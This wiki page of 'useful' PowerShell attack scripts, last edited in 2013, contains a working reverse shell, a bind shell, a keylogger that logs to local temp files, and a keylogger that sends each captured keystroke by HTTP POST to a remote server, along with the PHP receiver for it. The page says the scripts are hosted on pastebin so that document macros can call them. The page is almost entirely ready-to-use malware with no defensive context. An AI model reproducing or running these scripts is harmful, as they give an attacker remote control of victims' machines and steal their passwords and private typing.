Useful Scripts
Powershell
These scripts are also stored at [http://pastebin.com/u/powershell] so they can be called from macro's.
Reverse Shell (update address and port before using)
function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()};if ($process.ExitCode -ne $null) {$process.Close()}; exit; } $address = '127.0.0.1'; $port = '12345'; $client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ; $stream = $client.GetStream(); $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize ; $process = New-Object System.Diagnostics.Process ; $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' ; $process.StartInfo.RedirectStandardInput = 1 ; $process.StartInfo.RedirectStandardOutput = 1; $process.StartInfo.UseShellExecute = 0 ; $process.Start() ; $inputstream = $process.StandardInput ; $outputstream = $process.StandardOutput ; Start-Sleep 1 ; $encoding = new-object System.Text.AsciiEncoding ; while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}; $stream.Write($encoding.GetBytes($out),0,$out.Length) ; $out = $null; $done = $false; $testing = 0; while (-not $done) {if ($client.Connected -ne $true) {cleanup} ; $pos = 0; $i = 1; while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos); $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} ; if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos); $inputstream.write($string); start-sleep 1; if ($process.ExitCode -ne $null) {ReverseShellClean}; else { $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){; $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}; $stream.Write($encoding.GetBytes($out),0,$out.length); $out = $null; $string = $null}; } else {ReverseShellClean}};
Bind shell
function BindShell {
$port = "12345"
$encoding = new-object System.Text.AsciiEncoding
$endpoint = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, $port)
$listener = new-object System.Net.Sockets.TcpListener $endpoint
$listener.start()
$socket = $listener.AcceptTcpClient()
$networkstream = $socket.GetStream()
$networkbuffer = New-Object System.Byte[] $socket.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
while($outputstream.Peek() -ne -1){
$string += $encoding.GetString($outputstream.Read())
}
$networkstream.Write($encoding.GetBytes($string),0,$string.Length)
$string = ''
$done = $false
while (-not $done) {
$pos = 0
$i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $networkstream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read
if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {
break
}
}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
# Write Output
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read())
}
$networkstream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
}
else {$done = $true}
}
}
bindshell
Keylogger to local files
function KeyLog {
$MAPVK_VK_TO_VSC = 0x00
$MAPVK_VSC_TO_VK = 0x01
$MAPVK_VK_TO_CHAR = 0x02
$MAPVK_VSC_TO_VK_EX = 0x03
$MAPVK_VK_TO_VSC_EX = 0x04
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {
Start-Sleep -Milliseconds 40
$gotit = ""
for ($char = 1; $char -le 254; $char++)
{$vkey = $char
$gotit = $getKeyState::GetAsyncKeyState($vkey)
if ($gotit -eq -32767)
{$l_shift = $getKeyState::GetAsyncKeyState(160)
$r_shift = $getKeyState::GetAsyncKeyState(161)
$caps_lock = [console]::CapsLock
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
$kbstate = New-Object Byte[] 256
$checkkbstate = $getKBState::GetKeyboardState($kbstate)
$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
if ($unicode_res -gt 0)
{
$keys = $mychar.ToString()
$temp = "$env:temp\audit"
$logfile = "$env:temp\Logging"
add-content $temp $keys
$text = [string]::Join("`n", (Get-Content $logfile))
Write-Output $text > $logfile
}}}}}
KeyLog
Keylogger to HTTP Post
# PHP Code for logging of keys
# FYI - need to create a keylogs folder for php script to write to
#
# <?php
# $saving = $_REQUEST['saving'];
# if ($saving == "1"){
# $data = $_POST['data'];
# $file = $_POST['filename'];
#
# $fp = fopen("keylogs/".$file, "a") or die("Couldn't open $file for writing!");
# fwrite($fp, $data) or die("Couldn't write values to file!");
# fclose($fp);
# }
# ?>
function KeyLog {
$MAPVK_VK_TO_VSC = 0x00
$MAPVK_VSC_TO_VK = 0x01
$MAPVK_VK_TO_CHAR = 0x02
$MAPVK_VSC_TO_VK_EX = 0x03
$MAPVK_VK_TO_VSC_EX = 0x04
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {
Start-Sleep -Milliseconds 40
$gotit = ""
for ($char = 1; $char -le 254; $char++)
{$vkey = $char
$gotit = $getKeyState::GetAsyncKeyState($vkey)
if ($gotit -eq -32767)
{$l_shift = $getKeyState::GetAsyncKeyState(160)
$r_shift = $getKeyState::GetAsyncKeyState(161)
$caps_lock = [console]::CapsLock
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
$kbstate = New-Object Byte[] 256
$checkkbstate = $getKBState::GetKeyboardState($kbstate)
$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
if ($unicode_res -gt 0)
{$keydate = get-date -format yyyyMMdd
$logfile = "$env:computername-$keydate-keys.txt"
$url = "http://myserver/storage/PostKeys.php"
$parameters = "saving=1&data=$keys&filename=$logfile"
$keys = $mychar.ToString()
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open('POST', $url, $false)
$http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length)
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
}}}}}
KeyLog
page revision: 10, last edited: 07 Dec 2013 06:54